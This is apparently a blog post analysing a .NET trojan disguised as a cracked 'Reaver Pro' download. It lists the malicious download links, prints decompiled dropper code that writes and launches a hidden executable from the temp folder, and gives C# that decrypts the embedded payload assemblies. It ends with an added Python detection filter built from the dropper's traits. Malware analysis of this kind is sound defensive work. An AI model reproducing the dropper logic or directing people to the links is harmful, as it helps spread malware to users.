.Net Malware Analyses

Malicious download link:
http://downloadcsoftware.blogspot.ro/2014/09/download-reaver-pro-wifi-hack-full-crack.html
http://pasted.co/21439e76

Do not execute the malware!

private static void Main()
{
    Running = Assembly.Load(Dew("Bctlx.pryor.resources"));  // The Dew method returns the bytes of the assembly to be loaded
    Swagger("Scribe", new object[] { Dew("Myft.pryor.resources"), false, "winini.exe", true, 0 });
    while (Threads.Count > 0)
    {
        Threads.Dequeue().Join();
    }
}

The Swagger method:
private static void Swagger(string name, params object[] values)
{
    Thread item = new Thread(delegate {
        Type type = Running.GetType("Ax");
        foreach (MethodInfo info in type.GetMethods())
        {
            if (!(info.Name != name))
            {
                info.Invoke(null, values);
                break;
            }
        }
    });
    item.SetApartmentState(ApartmentState.STA);
    item.Start();
    Threads.Enqueue(item);
}

You must set the flags of the type/method ("Sheeit" type / "Dew" method) to public in order to be able to get them!

The C# code which decrypts these two assemblies:
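// Run this only inside an isolated analysis VM: it loads the sample and invokes its Dew method.
using System;
using System.IO;
using System.Reflection;

string filename = "D:\\Reaver.exe";
try
{
    // Load the sample by the identity read from the file on disk
    AssemblyName an = AssemblyName.GetAssemblyName(filename);
    Assembly assembly = Assembly.Load(an);

    // "Sheeit" and "Dew" must have been patched to public beforehand
    Type Sheeit_type = assembly.GetType("Sheeit");
    MethodInfo Dew_method = Sheeit_type.GetMethod("Dew");

    // Dew returns the decrypted bytes of the named embedded resource
    byte[] bytes = (byte[])Dew_method.Invoke(null, new object[] { "Bctlx.pryor.resources" });
    File.WriteAllBytes("D:\\Bctlx.pryor.exe", bytes);
    bytes = (byte[])Dew_method.Invoke(null, new object[] { "Myft.pryor.resources" });
    File.WriteAllBytes("D:\\Myft.pryor.exe", bytes);
}
catch (Exception ex)
{
    // Report the failure instead of swallowing it silently
    Console.Error.WriteLine(ex);
}
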
// Assembly Run, Version 0.0.0.0
Location: D:\Bctlx.pryor.exe
Type: "Ax" (see previous Swagger method - Type type = Running.GetType("Ax");)
Method name = "Scribe" (see Swagger("Scribe", ...))

public static void Scribe(byte[] bytes, bool rndName, string location, bool start, int TempAppData)
{
    if (rndName)
    {
        location = rndmkey(5).ToLower() + ".exe";
    }
    string path = Conversions.ToString(Interaction.IIf(TempAppData == 0, Path.GetTempPath() + location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).Replace("Roaming", "") + location));
    while (File.Exists(path))
    {
        location = rndmkey(5).ToLower() + ".exe";
        path = Conversions.ToString(Interaction.IIf(TempAppData == 0, Path.GetTempPath() + location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).Replace("Roaming", "") + location));
    }
    try
    {
        File.WriteAllBytes(path, bytes);
    }
    catch (Exception exception1)
    {
        ProjectData.SetProjectError(exception1);
        ProjectData.ClearProjectError();
    }
    if (start)
    {
        Process.Start(path, "cvtres.exe");
    }
}

The Scribe method will create the "winini.exe" file (string location) in the temporary directory with the bytes from Dew("Myft.pryor.resources").
After that it will start the process using:
Process.Start Method (String, String)

public static Process Start(
    string fileName,
    string arguments
)

The Main of Myft.pryor.exe looks like this:
private static void Main()
{
    Running = Assembly.Load(Dew("Bctlx.pryor.resources"));
    Swagger("Begin", new object[] { "Windows Live", Path.Combine(Path.GetTempPath(), "winini.exe"), true });
    Swagger("Run", new object[] { "cvtres.exe", Dew("Myft.pryor.resources"), Dew("Wks.pryor.resources"), false });
    while (Threads.Count > 0)
    {
        Threads.Dequeue().Join();
    }
}
We again decompress these.
Myft.pryor(2).exe is packed with UPX,
comment Remote Service Application,
original file name: MSRSAAP.EXE
http://www.herdprotect.com/msrsaap.exe-6b306e1b7996a339e082507f85fb1d5f59355bd3.aspx
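
Added example, not part of the original post: a detection check that turns the Scribe behaviour shown above (drop into the temp or AppData folder, "winini.exe" or a 5-character random name, started with "cvtres.exe" as argument) into a filter over process-creation records. The record shape (image path, command line), the default C:\Users profile layout, the rndmkey alphabet and the names scribe_indicators and flag are assumptions made for this example.

```python
import re
from ntpath import basename, dirname, normpath

# Scribe writes to Path.GetTempPath() (TempAppData == 0) or to the ApplicationData
# path with "Roaming" stripped, i.e. directly under ...\AppData\.
# Assumption: default per-user profile layout under <drive>:\Users\<name>.
DROP_DIR = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata(\\local\\temp)?$", re.I)
# rndmkey(5).ToLower() + ".exe"; rndmkey's alphabet is not shown in the post,
# so lowercase letters and digits are an assumption.
RANDOM_NAME = re.compile(r"^[a-z0-9]{5}\.exe$")

def scribe_indicators(image, command_line):
    """Return the Scribe traits present in one process-creation record."""
    hits = []
    image = normpath(image)
    if DROP_DIR.match(dirname(image)):
        hits.append("drop_dir")
    name = basename(image)
    if name.lower() == "winini.exe":
        hits.append("fixed_name")
    elif RANDOM_NAME.match(name):
        hits.append("random_name")
    # Process.Start(path, "cvtres.exe") passes cvtres.exe as the argument.
    if command_line.strip().lower().endswith(" cvtres.exe"):
        hits.append("cvtres_arg")
    return hits

def flag(events):
    """Images started from a Scribe drop directory with at least one more trait."""
    flagged = []
    for image, command_line in events:
        hits = scribe_indicators(image, command_line)
        if "drop_dir" in hits and len(hits) > 1:
            flagged.append((image, hits))
    return flagged

# Constructed sample records (image path, command line); not taken from a real host.
EVENTS = [
    (r"C:\Users\alice\AppData\Local\Temp\winini.exe",
     r'"C:\Users\alice\AppData\Local\Temp\winini.exe" cvtres.exe'),
    (r"C:\Users\alice\AppData\qzk7m.exe",
     r'"C:\Users\alice\AppData\qzk7m.exe" cvtres.exe'),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" /NOLOGO /READONLY'),
    (r"C:\Users\alice\AppData\Local\Temp\vc_redist.x64.exe",
     r'"C:\Users\alice\AppData\Local\Temp\vc_redist.x64.exe" /quiet'),
]

if __name__ == "__main__":
    for image, hits in flag(EVENTS):
        print(image, hits)
```

The legitimate cvtres.exe run and the ordinary installer in the temp folder are not flagged; only records that combine the drop directory with a name or argument trait are.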

 

 
